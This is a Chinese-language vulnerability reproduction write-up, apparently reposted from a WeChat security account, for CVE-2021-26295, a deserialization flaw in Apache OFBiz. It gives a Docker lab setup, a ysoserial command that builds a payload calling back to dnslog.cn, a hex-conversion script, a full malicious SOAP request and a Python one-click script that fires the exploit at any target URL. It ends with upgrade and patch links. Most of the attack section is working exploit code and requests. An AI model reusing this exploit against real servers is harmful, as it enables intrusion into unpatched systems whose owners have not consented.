Apache OFBiz < 17.12.06
环境搭建采用docker搭建,比较方便
docker run -d -p 811:8080 -p 8443:8443 opensourceknight/ofbiz网址 https://your_ip:8443
能正常访问即说明环境搭建成功
使用的工具和脚本:
java反序列利用工具ysoserial-0.0.6-SNAPSHOT-all.jar
str_hex.py
#!/usr/bin/python#conding=utf8import binasciiwith open('payload.txt', 'rb') as payload_handle:content = payload_handle.read()str_hex = binascii.hexlify(content)print(str_hex)
1、通过ysoserial-0.0.6-SNAPSHOT-all.jar生成dns回显的payload
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://nu2xus.dnslog.cn > payload.txt2、通过python脚本将payload转换为hex
python str_hex.py
3、构造dns回显poc
poc路径:/webtools/control/SOAPService
POST /webtools/control/SOAPService HTTP/1.1Host: 172.16.61.130:8443User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: test/xmlContent-Length: 875<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ying:clearAllEntityCaches xmlns:ying="http://ofbiz.apache.org/service/"><ying:cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400106e75327875732e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f6e75327875732e646e736c6f672e636e78</ying:cus-obj></ying:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>
查看dnslog.cn可以看见已经存在访问记录了
4.、py一键测试
将ysoserial文件跟OFBiz.py文件放在同目录
#!/usr/bin/python# coding=utf8import sysimport requestsimport sslfrom optparse import OptionParserimport osimport binasciifrom fake_useragent import UserAgentfrom requests.packages.urllib3.exceptions import InsecureRequestWarningssl._create_default_https_context = ssl._create_unverified_contextrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)def addoptions(): hstr = 'python3 7961.py -u https://192.168.1.1:8443 -d http://dnslog.cn' opt = OptionParser(hstr) opt.add_option('-d','--dnslog',type='string',action="store",dest='dnslog',help='dnslog') opt.add_option('-u', '--url', type='string', action="store", dest='url', help='target_url') (opts,args) = opt.parse_args() global dnslog global url dnslog = opts.dnslog url = opts.url if not opts.dnslog: sys.exit("must be given target url,use -d ") if not opts.url: sys.exit("must be given target url,use -u ")def exploit(url,dnslog): payload_url = url + '/webtools/control/SOAPService' os.system(f'java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS {dnslog} > payload.txt') with open('payload.txt', 'rb') as payload_handle: content = payload_handle.read() payload = binascii.hexlify(content).decode() data = f"""<?xml version='1.0' encoding='UTF-8'?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/><soapenv:Body> <ying:clearAllEntityCaches xmlns:ying="http://ofbiz.apache.org/service/"> <ying:cus-obj>{payload}</ying:cus-obj> </ying:clearAllEntityCaches> </soapenv:Body> </soapenv:Envelope>""" headers["Content-Type"]="text/xml" try: rep = requests.post(payload_url, data=data, verify=False, headers=headers) if rep.status_code == 200: print('[+]poc is completed') else: print('[-] poc failed') rep.close() except: print('[-]http access failed')if __name__ == '__main__': ua = UserAgent() headers = { 'User-Agent': ua.random } dnslog = '' url = '' addoptions() exploit(url,dnslog)
可更新至Apache OFBiz最新版
下载地址:
https://ofbiz.apache.org/download.html#vulnerabilities
应用漏洞补丁下载链接:
https://github.com/apache/ofbiz-fr amework/commit/af9ed4e/
参考链接:
原文始发于微信公众号(玄魂工作室):CVE-2021-26295:Apache OFBiz反序列化漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论